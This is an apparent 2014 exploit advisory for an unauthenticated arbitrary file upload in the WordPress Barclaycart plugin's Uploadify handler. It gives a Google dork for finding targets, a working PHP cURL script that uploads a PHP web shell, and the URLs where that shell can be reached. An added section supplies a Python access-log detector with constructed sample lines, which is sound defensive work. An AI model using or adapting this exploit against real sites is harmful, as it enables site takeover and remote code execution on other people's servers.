WP Barclaycart Plugins Arbitrary File Upload Vulnerability

March 18th, 2014

Exploit Title: WP Barclaycart Plugins Arbitrary File Upload Vulnerability
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
Google Dork: inurl:"wp-content/plugins/barclaycart"

Vulnerable location:

wp-content/plugins/barclaycart/uploadify/uploadify.php

The plugin ships the Uploadify server-side handler. It accepts a multipart POST with a Filedata file part and a folder parameter and writes the file into that folder; the exploit below sends no cookie or nonce and uploads a .php file, so the handler neither requires a logged-in user nor restricts the file type. Any visitor who can reach the script can therefore drop a PHP file on the server.

Exploit:

<?php
// Uploads a PHP file through the plugin's Uploadify handler without authenticating.
// The target host and the file name are the advisory's placeholders; adjust as needed.
$uploadfile = "Sh1Ne.php";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
// PHP < 5.5 used the "@file" prefix to attach a file; PHP 5.5+ uses CURLFile.
$filedata = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => $filedata,
    // Destination directory, relative to the web root, chosen by the client.
    'folder'   => '/wp-content/plugins/barclaycart/uploadify/'
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);   // the handler's response (normally the stored path)
curl_close($ch);
print "$postResult";
?>

Shell access:

Request the uploaded file from the folder given in the POST:

http://localhost/wp-content/plugins/barclaycart/uploadify/Sh1Ne.php

or, if the handler moves uploads into the WordPress uploads directory, look for it under:

http://localhost/wp-content/uploads/[years]/[month]/
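For defenders, the following is an added detection example, not part of the original advisory: it scans web-server access logs for the two steps above, a POST to the vulnerable uploadify.php followed by a request for a PHP file under either drop location, and correlates them by client IP. The log lines are constructed for illustration; the paths are the ones named on this page.

```python
import re
from collections import defaultdict

# Constructed sample log lines in Apache combined format (not from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [18/Mar/2014:10:01:12 +0000] "POST /wp-content/plugins/barclaycart/uploadify/uploadify.php HTTP/1.1" 200 57 "-" "curl/7.35.0"
203.0.113.5 - - [18/Mar/2014:10:01:14 +0000] "GET /wp-content/plugins/barclaycart/uploadify/Sh1Ne.php HTTP/1.1" 200 4096 "-" "curl/7.35.0"
198.51.100.9 - - [18/Mar/2014:10:02:00 +0000] "GET /wp-content/uploads/2014/03/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Mar/2014:10:02:30 +0000] "GET /wp-content/uploads/2014/03/cmd.php?c=id HTTP/1.1" 200 120 "-" "Mozilla/5.0"
192.0.2.7 - - [18/Mar/2014:10:03:00 +0000] "GET /wp-content/plugins/barclaycart/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_HANDLER = "/wp-content/plugins/barclaycart/uploadify/uploadify.php"
# Directories where the advisory says the uploaded file ends up.
SHELL_DIRS = ("/wp-content/plugins/barclaycart/uploadify/", "/wp-content/uploads/")


def parse_line(line):
    """Parse one access-log line; return a dict or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_upload_attempt(rec):
    """POST to the Uploadify handler: the upload step of the exploit."""
    return rec["method"] == "POST" and rec["path"].split("?")[0] == UPLOAD_HANDLER


def is_shell_hit(rec):
    """A .php file served from a drop directory (uploadify.php itself excluded)."""
    path = rec["path"].split("?")[0]
    return (path.lower().endswith(".php")
            and path != UPLOAD_HANDLER
            and any(path.startswith(d) for d in SHELL_DIRS))


def detect(log_text):
    """Return a list of (client_ip, reason, path) findings in log order."""
    findings = []
    uploads_by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if is_upload_attempt(rec):
            uploads_by_ip[rec["ip"]].append(rec["ts"])
            findings.append((rec["ip"], "upload-post", rec["path"]))
        elif is_shell_hit(rec):
            # Strongest signal: the same client POSTed to the handler earlier.
            reason = "shell-after-upload" if rec["ip"] in uploads_by_ip else "php-in-upload-dir"
            findings.append((rec["ip"], reason, rec["path"].split("?")[0]))
    return findings


if __name__ == "__main__":
    for ip, reason, path in detect(SAMPLE_LOG):
        print(f"{ip:15} {reason:20} {path}")
```

A plain GET of uploadify.php (last sample line) is not flagged: it is what scanners hitting the Google dork produce and carries no upload. A PHP file requested from wp-content/uploads is flagged even without a preceding POST, because WordPress never serves legitimate PHP from there and the upload may have come through a log you are not looking at.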